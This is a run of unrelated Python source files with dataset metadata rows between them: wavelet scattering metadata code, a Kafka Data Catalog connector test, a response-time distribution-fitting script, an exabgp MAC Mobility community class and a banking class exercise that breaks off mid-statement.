        - average_fr
        - average_fr_global
        - average_fr_global_phi
        - oversampling
        - oversampling_fr
        - max_pad_factor_fr (mainly via `unrestricted_pad_fr`)
        - max_noncqt_fr
        - out_exclude
        - paths_exclude

    and some of their interactions. Listed are only "unobvious" parameters;
    anything that controls the filterbanks will change meta (`J`, `Q`, etc).
    """
    def _get_compute_params(n2, n1_fr):
        """Reproduce exact logic in `timefrequency_scattering1d.py`."""
        # basics
        scale_diff = scf.scale_diffs[n2]
        J_pad_fr = scf.J_pad_frs[scale_diff]
        N_fr_padded = 2**J_pad_fr

        # n1_fr_subsample, lowpass_subsample_fr ##############################
        global_averaged_fr = (scf.average_fr_global if n1_fr != -1 else
                              scf.average_fr_global_phi)
        if n2 == -1 and n1_fr == -1:
            lowpass_subsample_fr = 0
            if scf.average_fr_global_phi:
                n1_fr_subsample = scf.log2_F
                log2_F_phi = scf.log2_F
                log2_F_phi_diff = 0
            else:
                log2_F_phi = scf.log2_F_phis['phi'][scale_diff]
                log2_F_phi_diff = scf.log2_F_phi_diffs['phi'][scale_diff]
                n1_fr_subsample = max(scf.n1_fr_subsamples['phi'][scale_diff] -
                                      scf.oversampling_fr, 0)
        elif n1_fr == -1:
            lowpass_subsample_fr = 0
            if scf.average_fr_global_phi:
                total_conv_stride_over_U1_phi = min(J_pad_fr, scf.log2_F)
                n1_fr_subsample = total_conv_stride_over_U1_phi
                log2_F_phi = scf.log2_F
                log2_F_phi_diff = 0
            else:
                n1_fr_subsample = max(scf.n1_fr_subsamples['phi'][scale_diff] -
                                      scf.oversampling_fr, 0)
                log2_F_phi = scf.log2_F_phis['phi'][scale_diff]
                log2_F_phi_diff = scf.log2_F_phi_diffs['phi'][scale_diff]
        else:
            total_conv_stride_over_U1 = (
                scf.total_conv_stride_over_U1s[scale_diff][n1_fr])
            n1_fr_subsample = max(scf.n1_fr_subsamples['spinned'
                                                       ][scale_diff][n1_fr] -
                                  scf.oversampling_fr, 0)
            log2_F_phi = scf.log2_F_phis['spinned'][scale_diff][n1_fr]
            log2_F_phi_diff = scf.log2_F_phi_diffs['spinned'][scale_diff][n1_fr]

            if global_averaged_fr:
                lowpass_subsample_fr = (total_conv_stride_over_U1 -
                                        n1_fr_subsample)
            elif scf.average_fr:
                lowpass_subsample_fr = max(total_conv_stride_over_U1 -
                                           n1_fr_subsample -
                                           scf.oversampling_fr, 0)
            else:
                lowpass_subsample_fr = 0

        # total stride, unpadding ############################################
        total_conv_stride_over_U1_realized = (n1_fr_subsample +
                                              lowpass_subsample_fr)

        if scf.out_3D:
            stride_ref = scf.total_conv_stride_over_U1s[0][0]
            stride_ref = max(stride_ref - scf.oversampling_fr, 0)
            ind_start_fr = scf.ind_start_fr_max[stride_ref]
            ind_end_fr = scf.ind_end_fr_max[ stride_ref]
        else:
            _stride = total_conv_stride_over_U1_realized
            ind_start_fr = scf.ind_start_fr[n2][_stride]
            ind_end_fr = scf.ind_end_fr[ n2][_stride]

        return (N_fr_padded, total_conv_stride_over_U1_realized,
                n1_fr_subsample, scale_diff, log2_F_phi_diff, log2_F_phi,
                ind_start_fr, ind_end_fr, global_averaged_fr)
    def _get_fr_params(n1_fr, scale_diff, log2_F_phi_diff, log2_F_phi):
        if n1_fr != -1:
            # spinned
            psi_id = scf.psi_ids[scale_diff]
            p = [scf.psi1_f_fr_up[field][psi_id][n1_fr]
                 for field in ('xi', 'sigma', 'j', 'is_cqt')]
        else:
            # phi_f
            if not scf.average_fr_global:
                F_phi = scf.F / 2**log2_F_phi_diff
                p = (0., sigma0 / F_phi, log2_F_phi, nan)
            else:
                p = (0., sigma0 / 2**log2_F_phi, log2_F_phi, nan)
        xi1_fr, sigma1_fr, j1_fr, is_cqt1_fr = p
        return xi1_fr, sigma1_fr, j1_fr, is_cqt1_fr
    def _exclude_excess_scale(n2, n1_fr):
        scale_diff = scf.scale_diffs[n2]
        psi_id = scf.psi_ids[scale_diff]
        j1_frs = scf.psi1_f_fr_up['j'][psi_id]
        return bool(n1_fr > len(j1_frs) - 1)

    def _skip_path(n2, n1_fr):
        excess_scale = bool(scf.sampling_psi_fr == 'exclude' and
                            _exclude_excess_scale(n2, n1_fr))
        user_skip_path = bool(n2 in paths_exclude.get('n2', {}) or
                              n1_fr in paths_exclude.get('n1_fr', {}))
        return excess_scale or user_skip_path
    def _fill_n1_info(pair, n2, n1_fr, spin):
        if _skip_path(n2, n1_fr):
            return

        # track S1 from padding to `_joint_lowpass()`
        (N_fr_padded, total_conv_stride_over_U1_realized, n1_fr_subsample,
         scale_diff, log2_F_phi_diff, log2_F_phi, ind_start_fr, ind_end_fr,
         global_averaged_fr) = _get_compute_params(n2, n1_fr)

        # fetch xi, sigma for n2, n1_fr
        if n2 != -1:
            xi2, sigma2, j2, is_cqt2 = (xi2s[n2], sigma2s[n2], j2s[n2],
                                        is_cqt2s[n2])
        else:
            xi2, sigma2, j2, is_cqt2 = 0., sigma_low, log2_T, nan
        xi1_fr, sigma1_fr, j1_fr, is_cqt1_fr = _get_fr_params(
            n1_fr, scale_diff, log2_F_phi_diff, log2_F_phi)

        # get temporal stride info
        global_averaged = (average_global if n2 != -1 else
                           average_global_phi)
        if global_averaged:
            total_conv_stride_tm = log2_T
        else:
            k1_plus_k2 = max(min(j2, log2_T) - oversampling, 0)
            if average:
                k2_tm_J = max(log2_T - k1_plus_k2 - oversampling, 0)
                total_conv_stride_tm = k1_plus_k2 + k2_tm_J
            else:
                total_conv_stride_tm = k1_plus_k2
        stride = (total_conv_stride_over_U1_realized, total_conv_stride_tm)

        # distinguish between `key` and `n`
        n1_fr_n = n1_fr if (n1_fr != -1) else inf
        n1_fr_key = n1_fr if (n1_fr != -1) else 0
        n2_n = n2 if (n2 != -1) else inf
        n2_key = n2 if (n2 != -1) else 0

        # global average pooling, all S1 collapsed into single point
        if global_averaged_fr:
            meta['order' ][pair].append(2)
            meta['xi'    ][pair].append((xi2, xi1_fr, nan))
            meta['sigma' ][pair].append((sigma2, sigma1_fr, nan))
            meta['j'     ][pair].append((j2, j1_fr, nan))
            meta['is_cqt'][pair].append((is_cqt2, is_cqt1_fr, nan))
            meta['n'     ][pair].append((n2_n, n1_fr_n, nan))
            meta['s'     ][pair].append((spin,))
            meta['stride'][pair].append(stride)
            meta['key'   ][pair].append((n2_key, n1_fr_key, 0))
            return

        fr_max = scf.N_frs[n2] if (n2 != -1) else len(xi1s)
        # simulate subsampling
        n1_step = 2 ** total_conv_stride_over_U1_realized
        for n1 in range(0, N_fr_padded, n1_step):
            # simulate unpadding
            if n1 / n1_step < ind_start_fr:
                continue
            elif n1 / n1_step >= ind_end_fr:
                break
            if n1 >= fr_max:  # equivalently `j1 > j2`
                # these are padded rows, no associated filters
                xi1, sigma1, j1, is_cqt1 = nan, nan, nan, nan
            else:
                xi1, sigma1, j1, is_cqt1 = (xi1s[n1], sigma1s[n1], j1s[n1],
                                            is_cqt1s[n1])
            meta['order' ][pair].append(2)
            meta['xi'    ][pair].append((xi2, xi1_fr, xi1))
            meta['sigma' ][pair].append((sigma2, sigma1_fr, sigma1))
            meta['j'     ][pair].append((j2, j1_fr, j1))
            meta['is_cqt'][pair].append((is_cqt2, is_cqt1_fr, is_cqt1))
            meta['n'     ][pair].append((n2_n, n1_fr_n, n1))
            meta['s'     ][pair].append((spin,))
            meta['stride'][pair].append(stride)
            meta['key'   ][pair].append((n2_key, n1_fr_key, n1))
    # set params
    log2_T = math.floor(math.log2(T))
    log2_F = math.floor(math.log2(scf.F))

    # extract filter meta
    sigma_low, xi1s, sigma1s, j1s, is_cqt1s, xi2s, sigma2s, j2s, is_cqt2s = \
        calibrate_scattering_filters(J, Q, T, J_pad=J_pad, r_psi=r_psi)
    j1_frs = scf.psi1_f_fr_up['j']

    # fetch phi meta; must access `phi_f_fr` as `j1s_fr` requires sampling phi
    meta_phi = {}
    for field in ('xi', 'sigma', 'j'):
        meta_phi[field] = {}
        for k in scf.phi_f_fr[field]:
            meta_phi[field][k] = scf.phi_f_fr[field][k]
    xi1s_fr_phi, sigma1_fr_phi, j1s_fr_phi = list(meta_phi.values())

    meta = {}
    inf = -1  # placeholder for infinity
    nan = math.nan
    coef_names = (
        'S0',                # (time)  zeroth order
        'S1',                # (time)  first order
        'phi_t * phi_f',     # (joint) joint lowpass
        'phi_t * psi_f',     # (joint) time lowpass
        'psi_t * phi_f',     # (joint) freq lowpass
        'psi_t * psi_f_up',  # (joint) spin up
        'psi_t * psi_f_dn',  # (joint) spin down
    )
    for field in ('order', 'xi', 'sigma', 'j', 'is_cqt', 'n', 's', 'stride',
                  'key'):
        meta[field] = {name: [] for name in coef_names}

    # Zeroth-order ###########################################################
    if average_global:
        k0 = log2_T
    elif average:
        k0 = max(log2_T - oversampling, 0)
    meta['order' ]['S0'].append(0)
    meta['xi'    ]['S0'].append((nan, nan, 0. if average else nan))
    meta['sigma' ]['S0'].append((nan, nan, sigma_low if average else nan))
    meta['j'     ]['S0'].append((nan, nan, log2_T if average else nan))
    meta['is_cqt']['S0'].append((nan, nan, nan))
    meta['n'     ]['S0'].append((nan, nan, inf if average else nan))
    meta['s'     ]['S0'].append((nan,))
    meta['stride']['S0'].append((nan, k0 if average else nan))
    meta['key'   ]['S0'].append((0, 0, 0))
    # First-order ############################################################
    def stride_S1(j1):
        sub1_adj = min(j1, log2_T) if average else j1
        k1 = max(sub1_adj - oversampling, 0)
        k1_J = max(log2_T - k1 - oversampling, 0)
        if average_global:
            total_conv_stride_tm = log2_T
        elif average:
            total_conv_stride_tm = k1 + k1_J
        else:
            total_conv_stride_tm = k1
        return total_conv_stride_tm

    for (n1, (xi1, sigma1, j1, is_cqt1)
         ) in enumerate(zip(xi1s, sigma1s, j1s, is_cqt1s)):
        meta['order' ]['S1'].append(1)
        meta['xi'    ]['S1'].append((nan, nan, xi1))
        meta['sigma' ]['S1'].append((nan, nan, sigma1))
        meta['j'     ]['S1'].append((nan, nan, j1))
        meta['is_cqt']['S1'].append((nan, nan, is_cqt1))
        meta['n'     ]['S1'].append((nan, nan, n1))
        meta['s'     ]['S1'].append((nan,))
        meta['stride']['S1'].append((nan, stride_S1(j1)))
        meta['key'   ]['S1'].append((0, 0, n1))
    S1_len = len(meta['n']['S1'])
    assert S1_len >= scf.N_frs_max, (S1_len, scf.N_frs_max)
    # Joint scattering #######################################################
    # `phi_t * phi_f` coeffs
    _fill_n1_info('phi_t * phi_f', n2=-1, n1_fr=-1, spin=0)

    # `phi_t * psi_f` coeffs
    for n1_fr in range(len(j1_frs[0])):
        _fill_n1_info('phi_t * psi_f', n2=-1, n1_fr=n1_fr, spin=0)

    # `psi_t * phi_f` coeffs
    for n2, j2 in enumerate(j2s):
        if j2 == 0:
            continue
        _fill_n1_info('psi_t * phi_f', n2, n1_fr=-1, spin=0)

    # `psi_t * psi_f` coeffs
    for spin in (1, -1):
        pair = ('psi_t * psi_f_up' if spin == 1 else
                'psi_t * psi_f_dn')
        for n2, j2 in enumerate(j2s):
            if j2 == 0:
                continue
            psi_id = scf.psi_ids[scf.scale_diffs[n2]]
            for n1_fr, j1_fr in enumerate(j1_frs[psi_id]):
                _fill_n1_info(pair, n2, n1_fr, spin=spin)

    array_fields = ['order', 'xi', 'sigma', 'j', 'is_cqt', 'n', 's', 'stride',
                    'key']
    for field in array_fields:
        for pair, v in meta[field].items():
            meta[field][pair] = np.array(v)
    if scf.out_3D:
        # reorder for 3D
        for field in array_fields:
            # meta_len
            if field in ('s', 'order'):
                meta_len = 1
            elif field == 'stride':
                meta_len = 2
            else:
                meta_len = 3

            for pair in meta[field]:
                # number of n2s
                if pair.startswith('phi_t'):
                    n_n2s = 1
                else:
                    n_n2s = sum((j2 != 0 and n2 not in paths_exclude.get('n2', {}))
                                for n2, j2 in enumerate(j2s))
                # number of n1_frs; n_slices
                n_slices = None
                if pair in ('S0', 'S1'):
                    # simply expand dim for consistency, no 3D structure
                    meta[field][pair] = meta[field][pair].reshape(-1, 1, meta_len)
                    continue
                elif 'psi_f' in pair:
                    if pair.startswith('phi_t'):
                        n_slices = sum(not _skip_path(n2=-1, n1_fr=n1_fr)
                                       for n1_fr in range(len(j1_frs[0])))
                    else:
                        n_slices = sum(not _skip_path(n2=n2, n1_fr=n1_fr)
                                       for n2, j2 in enumerate(j2s)
                                       for n1_fr in range(len(j1_frs[0]))
                                       if j2 != 0)
                elif 'phi_f' in pair:
                    n_n1_frs = 1
                # n_slices
                if n_slices is None:
                    n_slices = n_n2s * n_n1_frs
                # reshape meta
                meta[field][pair] = meta[field][pair].reshape(n_slices, -1, meta_len)
    if out_exclude is not None:
        # drop excluded pairs
        for pair in out_exclude:
            for field in meta:
                del meta[field][pair]

    # ensure time / freq stride doesn't exceed log2_T / log2_F in averaged cases,
    # and J / J_fr in unaveraged
    smax_t_nophi = log2_T if average else max(J)
    if scf.average_fr:
        if not scf.out_3D and not scf.aligned:
            # see "Compute logic: stride, padding" in `core`
            smax_f_nophi = max(scf.log2_F, scf.J_fr)
        else:
            smax_f_nophi = scf.log2_F
    else:
        smax_f_nophi = scf.J_fr

    for pair in meta['stride']:
        if pair == 'S0' and not average:
            continue
        stride_max_t = (smax_t_nophi if ('phi_t' not in pair) else
                        log2_T)
        stride_max_f = (smax_f_nophi if ('phi_f' not in pair) else
                        log2_F)
        for i, s in enumerate(meta['stride'][pair][..., 1].ravel()):
            assert s <= stride_max_t, ("meta['stride'][{}][{}] > stride_max_t "
                                       "({} > {})").format(pair, i, s,
                                                           stride_max_t)
        if pair in ('S0', 'S1'):
            continue
        for i, s in enumerate(meta['stride'][pair][..., 0].ravel()):
            assert s <= stride_max_f, ("meta['stride'][{}][{}] > stride_max_f "
                                       "({} > {})").format(pair, i, s,
                                                           stride_max_f)

    if not scf.out_type.startswith('dict'):
        # join pairs
        if not scf.out_3D:
            meta_flat = {f: np.concatenate([v for v in meta[f].values()], axis=0)
                         for f in meta}
        else:
            meta_flat0 = {f: np.concatenate(
                [v for k, v in meta[f].items() if k in ('S0', 'S1')],
                axis=0) for f in meta}
            meta_flat1 = {f: np.concatenate(
                [v for k, v in meta[f].items() if k not in ('S0', 'S1')],
                axis=0) for f in meta}
            meta_flat = (meta_flat0, meta_flat1)
        meta = meta_flat

    return meta
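
# Example access pattern (added; a sketch -- `scf` comes from a built
# TimeFrequencyScattering1D instance, so this is only callable from inside
# the library):
#   meta['n']['psi_t * psi_f_up']    # (n2, n1_fr, n1) indices per coefficient
#   meta['stride']['psi_t * phi_f']  # (freq, time) strides per coefficient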
| 40.427381 | 83 | 0.55835 | 4,612 | 33,959 | 3.897225 | 0.116002 | 0.013353 | 0.011127 | 0.011684 | 0.430288 | 0.375932 | 0.324858 | 0.284077 | 0.261878 | 0.24324 | 0 | 0.033003 | 0.317412 | 33,959 | 839 | 84 | 40.475566 | 0.742407 | 0.367149 | 0 | 0.244706 | 0 | 0 | 0.040882 | 0.002186 | 0 | 0 | 0 | 0 | 0.007059 | 1 | 0.025882 | false | 0.014118 | 0.007059 | 0 | 0.061176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e77bc1533880b4a66753674e008ece8b99afe6f5 | 3,959 | py | Python | google-datacatalog-kafka-connector/tests/google/datacatalog_connectors/kafka/prepare/assembled_entry_factory_test.py | bonifacyj/datacatalog-connectors-message-brokers | 0f72c800ebf1e570b638a0ad930d48e9dc44a25e | [
"Apache-2.0"
] | 1 | 2021-04-30T22:52:41.000Z | 2021-04-30T22:52:41.000Z | google-datacatalog-kafka-connector/tests/google/datacatalog_connectors/kafka/prepare/assembled_entry_factory_test.py | bonifacyj/datacatalog-connectors-message-brokers | 0f72c800ebf1e570b638a0ad930d48e9dc44a25e | [
"Apache-2.0"
] | 2 | 2020-10-01T14:24:12.000Z | 2020-11-12T16:40:01.000Z | google-datacatalog-kafka-connector/tests/google/datacatalog_connectors/kafka/prepare/assembled_entry_factory_test.py | bonifacyj/datacatalog-connectors-message-brokers | 0f72c800ebf1e570b638a0ad930d48e9dc44a25e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
import mock
from google.datacatalog_connectors.commons_test import utils
from google.datacatalog_connectors.kafka import prepare
from google.datacatalog_connectors.kafka.config.\
    metadata_constants import MetadataConstants
from .. import test_utils
@mock.patch('google.cloud.datacatalog_v1beta1.DataCatalogClient.entry_path')
class AssembledEntryFactoryTestCase(unittest.TestCase):
    __PROJECT_ID = 'test_project'
    __LOCATION_ID = 'location_id'
    __ENTRY_GROUP_ID = 'kafka'
    __MOCKED_ENTRY_PATH = 'mocked_entry_path'
    __METADATA_SERVER_HOST = 'metadata_host'
    __MODULE_PATH = os.path.dirname(os.path.abspath(__file__))
    __PREPARE_PACKAGE = 'google.datacatalog_connectors.kafka.prepare'

    def setUp(self):
        entry_factory = test_utils.FakeDataCatalogEntryFactory(
            self.__PROJECT_ID, self.__LOCATION_ID, self.__METADATA_SERVER_HOST,
            self.__ENTRY_GROUP_ID)
        tag_factory = prepare.DataCatalogTagFactory()
        self.__assembled_entry_factory = prepare.assembled_entry_factory. \
            AssembledEntryFactory(
                AssembledEntryFactoryTestCase.__ENTRY_GROUP_ID,
                entry_factory, tag_factory)
        tag_templates = {
            'kafka_cluster_metadata': {},
            'kafka_topic_metadata': {}
        }
        self.__assembled_entry_factory_with_tag_template = prepare.\
            assembled_entry_factory.AssembledEntryFactory(
                AssembledEntryFactoryTestCase.__ENTRY_GROUP_ID,
                entry_factory, tag_factory, tag_templates)

    def test_dc_entries_should_be_created_from_cluster_metadata(
            self, entry_path):
        entry_path.return_value = \
            AssembledEntryFactoryTestCase.__MOCKED_ENTRY_PATH
        metadata = utils.Utils.convert_json_to_object(self.__MODULE_PATH,
                                                      'test_metadata.json')
        assembled_entries = self.__assembled_entry_factory.\
            make_entries_from_cluster_metadata(metadata)
        num_topics = len(metadata[MetadataConstants.TOPICS])
        num_clusters = 1
        self.assertEqual(num_topics + num_clusters, len(assembled_entries))

    @mock.patch('{}.'.format(__PREPARE_PACKAGE) + 'datacatalog_tag_factory.' +
                'DataCatalogTagFactory.make_tag_for_cluster')
    @mock.patch('{}.datacatalog_tag_factory.'.format(__PREPARE_PACKAGE) +
                'DataCatalogTagFactory.make_tag_for_topic')
    def test_with_tag_templates_should_be_converted_to_dc_entries_with_tags(
            self, make_tag_for_topic, make_tag_for_cluster, entry_path):
        entry_path.return_value = \
            AssembledEntryFactoryTestCase.__MOCKED_ENTRY_PATH
        entry_factory = \
            self.__assembled_entry_factory_with_tag_template
        cluster_metadata = utils.Utils.convert_json_to_object(
            self.__MODULE_PATH, 'test_metadata.json')
        num_topics = len(cluster_metadata[MetadataConstants.TOPICS])

        prepared_entries = \
            entry_factory. \
            make_entries_from_cluster_metadata(
                cluster_metadata)

        for entry in prepared_entries:
            self.assertEqual(1, len(entry.tags))
        self.assertEqual(num_topics, make_tag_for_topic.call_count)
        self.assertEqual(1, make_tag_for_cluster.call_count)
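
# Added note: to run just this module (command assumes pytest and the
# connector's dependencies are installed; the path follows this row's repo
# layout, rooted at google-datacatalog-kafka-connector/):
#   python -m pytest tests/google/datacatalog_connectors/kafka/prepare/assembled_entry_factory_test.py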
| 42.569892 | 79 | 0.717605 | 446 | 3,959 | 5.914798 | 0.309417 | 0.050038 | 0.047763 | 0.037908 | 0.289613 | 0.26232 | 0.26232 | 0.200152 | 0.200152 | 0.200152 | 0 | 0.004167 | 0.211922 | 3,959 | 92 | 80 | 43.032609 | 0.841346 | 0.142713 | 0 | 0.090909 | 0 | 0 | 0.111276 | 0.07665 | 0 | 0 | 0 | 0 | 0.060606 | 1 | 0.045455 | false | 0 | 0.106061 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e77e4dc700080418326c39439db7328ed34301f1 | 3,351 | py | Python | miscellaneous_server_test/time_distribution/time_distribution.py | gellens/Master_thesis_JAQ_code | 034de9d7883c0d81564f975405c8985aa4b4d428 | [
"MIT"
] | null | null | null | miscellaneous_server_test/time_distribution/time_distribution.py | gellens/Master_thesis_JAQ_code | 034de9d7883c0d81564f975405c8985aa4b4d428 | [
"MIT"
] | null | null | null | miscellaneous_server_test/time_distribution/time_distribution.py | gellens/Master_thesis_JAQ_code | 034de9d7883c0d81564f975405c8985aa4b4d428 | [
"MIT"
] | 1 | 2020-03-05T14:09:01.000Z | 2020-03-05T14:09:01.000Z | # import matplotlib
# import statsmodels as sm
# import scipy.stats as st
# import pandas as pd
# import warnings
import json
import os
from scipy.stats import gamma
from scipy.stats import lognorm
from scipy.stats import pareto
from scipy.stats import norm
import numpy as np
import matplotlib.pyplot as plt
def warmup_filter(d):
    warm_up_measures = 2
    return d[warm_up_measures:]
def load_data():
    base_path = "./data"
    data_files_path = [os.path.join(base_path, f) for f in os.listdir(base_path) if os.path.isfile(os.path.join(base_path, f))]
    data_merged = []
    for f_path in data_files_path:
        with open(f_path) as f:
            data = json.load(f)  # drop the first 2 warm-up measurements
            data_merged += warmup_filter(data)
    return data_merged
def compute_sse(times, d, arg, loc, scale):
    # source: https://stackoverflow.com/questions/6620471/fitting-empirical-distribution-to-theoretical-ones-with-scipy-python
    BINS = 50  # number of bars in the histogram
    y, x = np.histogram(times, bins=BINS, density=True)
    x = (x + np.roll(x, -1))[:-1] / 2.0  # x now holds the center value of each bar

    # Calculate fitted PDF and error with fit in distribution
    pdf = d.pdf(x, *arg, loc=loc, scale=scale)
    sse = np.sum(np.power(y - pdf, 2.0))
    return sse
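
# Sanity-check sketch (added; not in the original script): fitting the right
# family to synthetic data should yield a small SSE.
#   samples = norm.rvs(loc=100, scale=10, size=10000)
#   compute_sse(samples, norm, (), 100, 10)  # close to 0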
def fit_distributions(times):
    cut_off = 500
    distribution = {
        "Gamma": gamma,
        "Lognormal": lognorm,
        "Pareto": pareto,
        "Normal": norm
    }
    fig, ax = plt.subplots(1, 1)

    best_sse = 1  # worst value possible in our case
    best_d = None
    best_d_str = None
    best_arg = []
    best_loc = None
    best_scale = None

    for d_str, d in distribution.items():
        params = d.fit(times, scale=10)
        # Separate parts of parameters
        arg = params[:-2]
        loc = params[-2]
        scale = params[-1]

        # check if better sse
        sse = compute_sse(times, d, arg, loc, scale)
        if sse < best_sse:
            best_sse = sse
            best_d = d
            best_d_str = d_str
            best_arg = arg
            best_loc = loc
            best_scale = scale

        # plot the distribution
        x = np.linspace(d.ppf(0.001, *arg, loc=loc, scale=scale),
                        d.ppf(0.99, *arg, loc=loc, scale=scale), 200)
        ax.plot(x, d.pdf(x, *arg, loc=loc, scale=scale), '-', lw=2, alpha=0.6, label=d_str + ' pdf')

    # source clip: https://stackoverflow.com/questions/26218704/matplotlib-histogram-with-collection-bin-for-high-values
    ax.hist(np.clip(times, 0, cut_off), 50, density=True, histtype='stepfilled', alpha=0.2)
    ax.legend(loc='best', frameon=False)
    plt.xlabel('Response time')
    plt.ylabel('Probability density')
    plt.title('Distribution of response times')
    plt.show()

    print("The best distribution is the " + best_d_str + (" with argument: " + str(best_arg) if len(best_arg) > 0 else "") + " [loc: " + str(best_loc) + " scale: " + str(best_scale) + "]")
    mean = best_d.mean(*best_arg, loc=best_loc, scale=best_scale)
    var = best_d.var(*best_arg, loc=best_loc, scale=best_scale)
    print("MODEL: Mean:", mean, "Variance:", var)
    print("DATA : Mean:", np.mean(times), "Variance:", np.var(times))


def main():
    times = load_data()
    fit_distributions(times)
if __name__ == "__main__":
    main()
| 31.027778 | 175 | 0.63026 | 504 | 3,351 | 4.05754 | 0.311508 | 0.035208 | 0.027384 | 0.03912 | 0.117359 | 0.098778 | 0.080196 | 0.05379 | 0 | 0 | 0 | 0.021662 | 0.242316 | 3,351 | 107 | 176 | 31.317757 | 0.783773 | 0.179946 | 0 | 0 | 0 | 0 | 0.081625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067568 | false | 0 | 0.108108 | 0 | 0.216216 | 0.040541 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7808d26b562a5ddeb70cd3327c78d41fcdc891d | 1,113 | py | Python | lib/exabgp/bgp/message/update/attribute/community/extended/mac_mobility.py | cloudscale-ch/exabgp | 55ee496dfbc3fce75c5107fae7a7d38567154d46 | [
"BSD-3-Clause"
] | 1 | 2019-06-25T20:49:37.000Z | 2019-06-25T20:49:37.000Z | lib/exabgp/bgp/message/update/attribute/community/extended/mac_mobility.py | nembery/exabgp | 53cfff843ddde33bf1c437a1c4ce99de20c6bade | [
"BSD-3-Clause"
] | null | null | null | lib/exabgp/bgp/message/update/attribute/community/extended/mac_mobility.py | nembery/exabgp | 53cfff843ddde33bf1c437a1c4ce99de20c6bade | [
"BSD-3-Clause"
] | 1 | 2020-07-23T16:52:51.000Z | 2020-07-23T16:52:51.000Z | # encoding: utf-8
"""
mac_mobility.py
Created by Anton Aksola on 2018-11-03
"""
from struct import pack
from struct import unpack
from exabgp.bgp.message.update.attribute.community.extended import ExtendedCommunity
# ================================================================== MacMobility
# RFC 7432 Section 7.7.
@ExtendedCommunity.register
class MacMobility (ExtendedCommunity):
    COMMUNITY_TYPE = 0x06
    COMMUNITY_SUBTYPE = 0x00
    DESCRIPTION = 'mac-mobility'

    __slots__ = ['sequence', 'sticky']

    def __init__ (self, sequence, sticky=False, community=None):
        self.sequence = sequence
        self.sticky = sticky
        ExtendedCommunity.__init__(
            self,
            community if community else pack(
                '!2sBxI',
                self._subtype(transitive=True),
                1 if sticky else 0,
                sequence
            )
        )

    def __hash__ (self):
        return hash((self.sticky, self.sequence))

    def __repr__ (self):
        s = "%s:%d" % (self.DESCRIPTION, self.sequence)
        if self.sticky:
            s += ":sticky"
        return s

    @staticmethod
    def unpack (data):
        flags, seq = unpack('!BxI', data[2:8])
        return MacMobility(seq, True if flags == 1 else False)
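
# Round-trip sketch (added; not in the original module): the payload packed in
# __init__ is type/subtype (2 bytes), a flags byte whose low bit marks a
# sticky/static MAC, one reserved byte, and a 4-byte sequence number;
# unpack() reads the flags and sequence back from bytes 2..7.
#   c = MacMobility(sequence=7, sticky=True)
#   repr(c)  # -> 'mac-mobility:7:sticky'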
| 22.26 | 84 | 0.666667 | 134 | 1,113 | 5.358209 | 0.485075 | 0.066852 | 0.044568 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029064 | 0.165319 | 1,113 | 49 | 85 | 22.714286 | 0.743811 | 0.154537 | 0 | 0 | 0 | 0 | 0.051557 | 0 | 0 | 0 | 0.008593 | 0 | 0 | 1 | 0.125 | false | 0 | 0.09375 | 0.03125 | 0.46875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e780d9438e176381d9f02f6add14e1524a0e07ab | 867 | py | Python | aprendizado/udemy/03_desafio_POO/main.py | renatodev95/Python | 2adee4a01de41f8bbb68fce563100c135a5ab549 | [
"MIT"
] | null | null | null | aprendizado/udemy/03_desafio_POO/main.py | renatodev95/Python | 2adee4a01de41f8bbb68fce563100c135a5ab549 | [
"MIT"
] | null | null | null | aprendizado/udemy/03_desafio_POO/main.py | renatodev95/Python | 2adee4a01de41f8bbb68fce563100c135a5ab549 | [
"MIT"
] | null | null | null | from banco import Banco
from cliente import Cliente
from conta import ContaCorrente, ContaPoupanca
banco = Banco()
cliente1 = Cliente('Luiz', 30)
cliente2 = Cliente('Maria', 18)
cliente3 = Cliente('João', 50)
conta1 = ContaPoupanca(1111, 254136, 0)
conta2 = ContaCorrente(2222, 254137, 0)
conta3 = ContaPoupanca(1212, 254138, 0)
cliente1.inserir_conta(conta1)
cliente2.inserir_conta(conta2)
cliente3.inserir_conta(conta3)
banco.inserir_cliente(cliente1)
banco.inserir_conta(conta1)
banco.inserir_cliente(cliente2)
banco.inserir_conta(conta2)
if banco.autenticar(cliente1):
    cliente1.conta.depositar(40)
    cliente1.conta.sacar(20)
else:
    print('Client not authenticated')
print('#################################')
if banco.autenticar(cliente2):
    cliente2.conta.depositar(40)
    cliente2.conta.sacar(20)
else:
